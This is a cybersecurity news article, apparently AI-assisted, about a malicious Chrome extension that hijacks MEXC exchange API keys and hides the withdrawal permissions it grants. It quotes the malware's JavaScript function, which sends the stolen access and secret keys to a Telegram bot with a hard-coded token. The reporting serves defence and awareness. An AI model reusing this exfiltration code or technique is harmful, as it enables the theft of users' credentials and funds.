Tuesday, August 11, 2026
LIVEThe Unrelenting Cyber Battle: Hacking Threats and the Imperative of Robust Data Protection///Navigating the Cyber Labyrinth: Bolstering Defenses Against Evolving Hacking Threats///The Dual Front War: Battling Hacking and Bolstering Data Protection in the Digital Age///The Ever-Evolving Cyber Threat Landscape: Navigating Hacking and Fortifying Data Protection///The Unseen Battle: Fortifying Data in an Age of Relentless Hacking///The Unseen War: Hacking's Relentless Advance and the Imperative of Data Protection///The Evolving Threat Landscape: Hacking, Data Protection, and the Imperative for Proactive Security///Navigating the Digital Minefield: Bolstering Data Protection in an Era of Relentless Hacking///The Dual Fronts of Digital Defense: Combating Hacking and Fortifying Data Protection///Hacking's New Frontier: Fortifying Data Protection in the Age of Advanced Cyber Threats///The Dual Front: Navigating Hacking Threats and Fortifying Data Protection in the Digital Age///Navigating the Digital Gauntlet: The Evolving Nexus of Hacking and Data Protection///The Unrelenting Cyber Battle: Hacking Threats and the Imperative of Robust Data Protection///Navigating the Cyber Labyrinth: Bolstering Defenses Against Evolving Hacking Threats///The Dual Front War: Battling Hacking and Bolstering Data Protection in the Digital Age///The Ever-Evolving Cyber Threat Landscape: Navigating Hacking and Fortifying Data Protection///The Unseen Battle: Fortifying Data in an Age of Relentless Hacking///The Unseen War: Hacking's Relentless Advance and the Imperative of Data Protection///The Evolving Threat Landscape: Hacking, Data Protection, and the Imperative for Proactive Security///Navigating the Digital Minefield: Bolstering Data Protection in an Era of Relentless Hacking///The Dual Fronts of Digital Defense: Combating Hacking and Fortifying Data Protection///Hacking's New Frontier: Fortifying Data Protection in the Age of Advanced Cyber Threats///The Dual Front: Navigating Hacking Threats and Fortifying Data Protection in the Digital Age///Navigating the Digital Gauntlet: The Evolving Nexus of Hacking and Data Protection///
Subscribe
Cyber Security
Independent · Digital
Thehackingpost
CybersecurityAI-assisted

Malicious Chrome Extension Steals Wallet Login Credentials and Enables Automated Trading

A Chrome extension named MEXC API Automator has been identified as malicious, exploiting browser trust to access cryptocurrency trading accounts on the MEXC platform.

A Chrome extension named MEXC API Automator has been identified as malicious, exploiting browser trust to access cryptocurrency trading accounts on the MEXC platform.

The extension masquerades as a tool for automating trading and API key creation. It covertly takes control of newly created API keys, facilitating unauthorized account access.

The attack originates from a legitimate-seeming Chrome Web Store listing. It claims to offer easy API key creation, including trading and withdrawal access for the MEXC exchange.

Once installed, the extension activates upon accessing MEXC's API management page, where users typically create keys for automated trading. It can silently create keys, initiate trades, and enable withdrawals.

Researchers at Socket.dev have classified the extension as malware, linking it to a threat actor known as jorjortan142. The extension operates within an already logged-in MEXC session, bypassing traditional password theft.

The extension masquerades as a tool for automating trading and API key creation.
Lucas Gallagher · Thehackingpost

The extension targets MEXC API keys, allowing both trading and withdrawals without requiring password access. These keys are often reused in automated scripts and are less frequently monitored than interactive logins.

Upon key creation, the extension captures the keys and transmits them to a Telegram infrastructure controlled by attackers.

The MEXC API Automator, a Manifest V3 Chrome extension, injects a content script into the MEXC API management page. It automatically selects all permission options, including withdrawals, and manipulates the page to hide these settings visually from the user.

The extension collects the Access Key and Secret Key upon creation and sends them to a predefined Telegram bot and chat ID.

Advertisement

function sendKeysToTelegram(apiKey, secretKey) { const botToken = '7534112291:AAF46jJWWo95XsRWkzcPevHW7XNo6cqKG9I'; const chatId = '6526634583'; fetch(`https://api.telegram.org/bot${botToken}/sendMessage`, { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ chat_id: chatId, text: `API Key: ${apiKey}\nSecret Key: ${secretKey}` }) }); }

The extension's activity blends into regular web traffic by operating within the browser sandbox, reading page content, and using HTTPS for data transmission. This delay in detection allows attackers to use the stolen keys for unauthorized transactions.

Based on reporting by Cyber Security News.

AI transparency. This article was produced with the assistance of artificial intelligence and published under human editorial oversight. AI systems can make mistakes. Read how we use AI (EU AI Act, Art. 50).
Related Stories